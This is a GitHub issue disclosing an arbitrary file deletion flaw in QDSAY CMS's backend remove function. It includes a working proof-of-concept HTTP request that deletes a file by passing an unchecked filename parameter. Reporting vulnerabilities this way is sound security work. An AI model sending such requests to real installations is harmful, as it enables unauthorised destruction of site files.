Skip to content

QDSAY cms has an arbitrary file deletion vulnerability in the remove function in application\backend\core\QD_Controller.php  #3

New issue
New issue
Open
Open
QDSAY cms has an arbitrary file deletion vulnerability in the remove function in application\backend\core\QD_Controller.php #3
@liao10086

Description

@liao10086
liao10086
opened on Aug 6, 2018

code
The function remove not limit the delete filename,so I can delete any file.
POC:

delete

GET /backend/article/remove?filename=%2Flicense.txt HTTP/1.1
Host: localhost
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
DNT: 1
Referer: http://localhost/backend/article/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_48659a4ab85f1bcebb11d3dd3ecb6760=1531379042; greencms_last_visit_page=aHR0cDovL2xvY2FsaG9zdC9pbmRleC5waHA%2FbT1hZG1pbiZjPXBvc3RzJmE9cG9zdHMmaWQ9MQ%3D%3D; greencms_post_add1=x%9C%85%8FK%0B%C20%10%84%FF%8A%EC%C1S%C5%24%B4M%8D%E2%C5%83%27O%1E%8DH%1Fi%0D%D44%98%CDA%C4%FFnJ%7D%80%82%9E%96%99%FDf%97%B9%82%ED%1C%1EPc%AB%40%80%F4i%C1%98%F4Y%5D%2A%E9%E3%9A%D7%D2%F3%84e%EB%B3Rf%B5%D9B4%F0egP%19%0C%89%85%5D%8EM%E1%EC%7C%F4%7F%F4%17S%22%7D2%E3U%14%84%A2i%7F%3E.%7F%85%16rj%97%E1o%99%A3%03%B1%03%0A%FB%080o%DEbhp%B1%7D%01%A7M%13%9A%3CL%879%FA%00%82%F5E%AB%DD%F1%E9%A3%3A%D96%C7%EF%00v6x%E4%29%AB%81a%84f%13%C2%27%94%8Dh%22%E8L%D0%17q%EA%2A%5DkU%7DP%A9+%5C%C4%2FJ%F7%7B%0A%B7%3B%29%BCqm; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1532595699; tm=20e0109ed56458f613d642c25308ebcc; ci_session=f381a36b9806873709c66b7841b4bae32054f2cc
Connection: close

I hope you can fix this vulnerability。
author by: xijun.liao@dbappsecurity.com.cn

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions